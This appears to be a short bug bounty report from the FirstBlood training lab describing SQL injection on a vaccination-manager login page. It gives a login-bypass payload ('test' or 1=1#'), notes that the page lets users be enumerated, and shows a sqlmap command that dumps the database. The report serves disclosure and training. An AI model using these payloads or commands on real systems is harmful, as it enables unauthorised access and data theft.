FirstBlood-#790 — SQLi allows to bypass login page for the vaccination-manager portal
This issue was discovered on FirstBlood v2
On 2021-10-28, panya Level 7 reported:
After some recon I found that the new feature (vaccination-manager) has a login page located at /vaccination-manager/login.php
.
The form allows enumerating registered users (because it returns an error "User does not exist" for an unregistered username). I tried username "admin" and it indeed registered (returns "Invalid username or password" for a random password).
But the password field value is vulnerable to SQL injection.
So to bypass the login form and logging-in as admin, we can use this payload as the admin
user's password field value: test' or 1=1#
Impact:
An attacker could log in to the vaccination manager portal as admin. Also, the attacker could exfiltrate data from this database, with sqlmap
, for example using this command:
sqlmap -u 'https://7f2942c64ee8-panya.a.firstbloodhackers.com/vaccination-manager/login.php' --data 'username=admin&password=test' --dbms MySQL --technique B --dump -D firstblood
P1 CRITICAL
Endpoint: /vaccination-manager/login.php
Parameter: password
Payload: &username=admin&test' or 1=1#
FirstBlood ID: 30
Vulnerability Type: SQL Injection
There is an SQL injection on the vaccination management portal login page which results in the user being able to login as the administrator.